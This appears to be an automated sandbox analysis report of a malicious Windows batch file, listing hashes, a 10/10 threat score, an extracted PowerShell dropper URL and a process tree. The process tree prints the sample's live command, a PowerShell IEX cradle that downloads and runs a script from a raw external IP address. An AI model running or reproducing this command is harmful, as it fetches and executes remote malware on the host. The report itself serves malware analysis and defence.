Analysis
-
max time kernel
111s -
max time network
135s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
15-05-2020 19:19
General
-
Target
399c49693a18efe92bd488070ce05958.bat
-
Size
219B
-
MD5
9f6f9d198ba17e88e3aaeab145105bbd
-
SHA1
24970fd1d68dd8c11b435442a710939a1d25def5
-
SHA256
e929eaff3a0856e72e5085f1829ec9794c8f729a198e10ff6376bd423bf6b593
-
SHA512
55359357d68d59d6dd7412600bb3ce137de55bc4dbd2569c2fc8082b9e070e20f74e90533caa09c455a8d97403600203abac9612c6f5aee39dfe8007062491bf
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/399c49693a18efe92bd488070ce05958
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\399c49693a18efe92bd488070ce05958.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/399c49693a18efe92bd488070ce05958');Invoke-ESZSYMZBHPFU;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB